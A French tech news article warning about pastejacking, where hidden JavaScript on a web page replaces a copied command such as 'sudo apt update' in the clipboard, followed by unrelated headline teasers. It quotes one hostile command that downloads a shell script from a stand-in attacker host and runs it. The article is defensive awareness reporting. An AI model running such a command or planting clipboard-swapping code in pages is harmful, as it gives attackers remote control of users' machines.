Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


Réagissez à cet article !

Demandez nos derniers articles !

Les meilleurs VPN pour voyager en 2026 : comparatif, conseils et critères essentiels

Voyager en 2026, c’est aussi protéger sa vie numérique. Entre Wi-Fi publics, restrictions géographiques et accès aux services français depuis l’étranger, choisir le bon VPN devient un réflexe essentiel pour…

Galaxy A57 et A37 : Samsung annonce enfin la date de lancement de ses futurs smartphones milieu de gamme

Alors que les futurs GalaxyA37 et A57 font l’objet de rumeurs incessantes depuis quelque temps, une information cruciale vient d’être révélée par la marque : Samsung a décidé de mettre fin…

Vos écouteurs sans fil ont aussi besoin d’être nettoyés, on vous explique pourquoi et comment

Nos écouteurs sans fil nous accompagnent tous les jours, que ce soit pour écouter de la musique dans les transports, pour travailler ou regarder sa série préférée. Et comme n’importe…

PlayStation arrête les jeux PC, mais on pourra quand même jouer à Wolverine ou Saros sur ordinateur de cette manière

Il semble se confirmer que PlayStation ne va plus porter ses jeux console sur PC. Mais il sera toujours possible d’accéder aux titres en streaming pour y jouer sur ordinateur….

Fini les poils d’animaux : l’aspirateur Shark Detect Clean avec autovidage passe à 252 € (-43%)

L’aspirateur sans fil Shark Detect Clean est un modèle taillé pour affronter les poils d’animaux sur tous les types de sols. Il bénéficie actuellement d’une réduction de 43 %, directement…

Voici comment Ford permet à la Mustang Mach-E 2026 de se recharger plus vite grâce à Apple CarPlay

La Mustang Mach-E 2026 gagne une nouvelle fonction sur CarPlay. Elle prépare sa batterie seule avant d’arriver à une borne de recharge rapide. Les trajets longue distance deviennent plus simples…

Test Huawei Watch GT Runner 2 : un coach marathon discret et efficace au poignet

Avec sa Watch GT Runner 2, Huawei lance une montre à destination des coureurs prêts à repousser leurs limites, jusqu’au marathon. Avec son équipement, son design et son rapport qualité-prix,…

L’attaque DDoS la plus puissante de l’histoire a mobilisé trois pays pour démanteler ce réseau

Trois pays se sont alliés pour neutraliser un réseau pirate d’une ampleur inédite. Plus de trois millions d’appareils connectés servaient d’armes à des attaques DDoS record. L’opération met fin à…

Vos notes ne sont plus en sécurité face à ce malware sur Android

Des informations très sensibles sont souvent stockées dans des applications de notes. Certains y enregistrent même leurs mots de passe sans protection. Un nouveau malware Android exploite cette habitude de…

Nintendo s’apprête à lancer un nouveau modèle de Switch 2, voici ce qui va changer

Pour se conformer au droit européen, Nintendo va modifier le design de la Switch 2 pour permettre de remplacer facilement la batterie de la console (et de ses Joy-Con). Moins…